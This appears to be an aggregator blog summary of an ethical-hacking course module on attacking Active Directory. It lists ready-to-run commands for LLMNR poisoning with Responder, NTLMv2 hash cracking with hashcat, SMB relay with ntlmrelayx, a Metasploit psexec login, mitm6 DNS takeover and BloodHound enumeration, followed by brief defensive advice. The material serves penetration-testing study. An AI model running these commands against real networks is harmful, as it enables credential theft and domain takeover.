Attacking Active Directory: Initial Attack Vectors and Post-Compromise Enumeration

Listen to this Post

In this article, Todd Mattran shares his progress in the PEH (Practical Ethical Hacking) course, specifically focusing on attacking Active Directory. Below are the key topics covered and verified commands/codes related to the article:

Topics Covered:

1. LLMNR Poisoning

2. Capturing Hashes with Responder

3. Cracking Hashes with HashCat

4. SMB Relay Attacks and Defenses

5. Gaining Shell Access with Metasploit

6. IPv6 DNS Takeover via mitm6

7. Passback Attacks

8. Post-Compromise Enumeration

Verified Commands and Codes:

1. LLMNR Poisoning

responder -I eth0 -wrf

This command starts Responder on the `eth0` interface to capture LLMNR and NBT-NS requests.

2. Capturing Hashes with Responder

responder -I eth0 -v

This command enables verbose mode to capture NTLMv2 hashes.

3. Cracking Hashes with HashCat

hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt

This command cracks NTLMv2 hashes using HashCat and the `rockyou.txt` wordlist.

4. SMB Relay Attacks

ntlmrelayx.py -tf targets.txt -smb2support

This command performs SMB relay attacks against the targets listed in targets.txt.

5. Gaining Shell Access with Metasploit

use exploit/windows/smb/psexec
set RHOSTS 192.168.1.10
set SMBUser admin
set SMBPass password123
exploit

This Metasploit module exploits SMB to gain shell access.

6. IPv6 DNS Takeover via mitm6

mitm6 -d domain.local -i eth0

This command starts mitm6 to spoof IPv6 DNS responses.

7. Passback Attacks

impacket-ntlmrelayx --no-http-server -smb2support -t smb://192.168.1.20

This command relays NTLM credentials to another SMB server.

8. Post-Compromise Enumeration

bloodhound-python -d domain.local -u user -p password -gc dc.domain.local -c all

This command collects data for BloodHound to analyze Active Directory relationships.

What Undercode Say:

Active Directory attacks are a critical aspect of penetration testing, and understanding the initial attack vectors is essential for both offensive and defensive cybersecurity professionals. LLMNR poisoning and SMB relay attacks exploit inherent weaknesses in network protocols, while tools like Responder and HashCat make it easier to capture and crack credentials. Metasploit remains a powerful tool for gaining shell access, and mitm6 demonstrates the risks of IPv6 misconfigurations. Post-compromise enumeration with tools like BloodHound helps attackers understand the domain structure and escalate privileges. Defenders should focus on disabling LLMNR/NBT-NS, enforcing SMB signing, and monitoring for unusual DNS or SMB activity. Regular penetration testing and red team exercises are crucial to identifying and mitigating these vulnerabilities. For further reading, check out the following resources:
Mitre ATT&CK Framework
BloodHound Documentation
HashCat Official Site

References:

initially reported by: https://www.linkedin.com/posts/todd-mattran-gogetit_passthetest-getbettereveryday-shareknowledge-activity-7296175752268390400-bgLW – Hackers Feeds
Extra Hub:
Undercode AIFeatured Image